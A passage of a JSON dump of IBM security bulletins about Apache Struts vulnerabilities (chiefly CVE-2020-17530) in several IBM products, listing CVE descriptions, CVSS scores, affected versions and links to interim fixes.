affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:50:13", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \nIBM Sterling Order Management| 9.4.x \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&amp;fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-05-11T01:06:34", "id": "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "href": "https://www.ibm.com/support/pages/node/6565855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for IBM Connections| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:03:35", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:03:35", "id": "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "href": "https://www.ibm.com/support/pages/node/6593791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:23", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T07:30:44", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T07:30:44", "id": "D7F5135F5917DEC79A3EC5F40696F566955841FB3632FC8C822946EC528790B3", "href": "https://www.ibm.com/support/pages/node/6593761", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:51:01", "description": "## Summary\n\nVulnerability in Apache Struts affects IBM Tivoli Application Dependency Discovery Manager (CVE-2020-17530).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Tivoli Application Dependency Discovery Manager| 7.3.0.7 - 7.3.0.8 \n \n## Remediation/Fixes\n\n**Fix**| **VRMF**| **APAR**| **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.26_FP8201126.zip| 7.3.0.7 - 7.3.0.8| None| [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=YSQ1wdrl2p5zUUGFQ8PqEQXZuGPl9v7OMZIWrZqmkfw> \"Download eFix\" ) \n \n**Note:** Please refer the \"How to install\" section of the efix_readme.txt while applying the above efix.\n\n## Workarounds and Mitigations\n\nThe eFix can be downloaded and applied directly on the applicable versions mentioned above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:25:40", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Tivoli Application Dependency Discovery Manager (CVE-2020-17530)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-13T12:25:40", "id": "47A9526430C9C366FECCD6852CFBC71095166B7357B960378A8A4EBF55B1FBCC", "href": "https://www.ibm.com/support/pages/node/6406954", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:24", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Microsoft SharePoint| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:01:55", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:01:55", "id": "BE38ED822E7AF0C00178B9F33546DB67627005E6481750CB7374811E7F5674AE", "href": "https://www.ibm.com/support/pages/node/6593789", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for File Systems| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| \n\nUse Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:00:32", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:00:32", "id": "456B2EB80A04726EA1ABA567940D381A0E2976991206F33CA962674055ED3FD9", "href": "https://www.ibm.com/support/pages/node/6593787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:45:05", "description": "## Summary\n\nVulnerability exists in the Apache Struts framework version used by IBM Spectrum Symphony V7.2.1, and V7.2.0.2. Interim fixes that provide instructions on upgrading the Apache Struts framework to version 2.5.26 (which resolves the vulnerability) are available on IBM Fix Central. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Symphony| 7.2.1 \nIBM Spectrum Symphony| 7.2.0.2 \n \n## Remediation/Fixes\n\n**Products**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nIBM Spectrum Symphony| 7.2.1| P104109| [sym-7.2.1-build600149](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600149&includeSupersedes=0> \"sym-7.2.1-build600149\" ) \nIBM Spectrum Symphony| 7.2.0.2| P104092| [sym-7.2.0.2-build600148](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600148&includeSupersedes=0> \"sym-7.2.0.2-build600148\" ) \n \n \n\n\n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-19T09:21:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts framework affects IBM Spectrum Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], 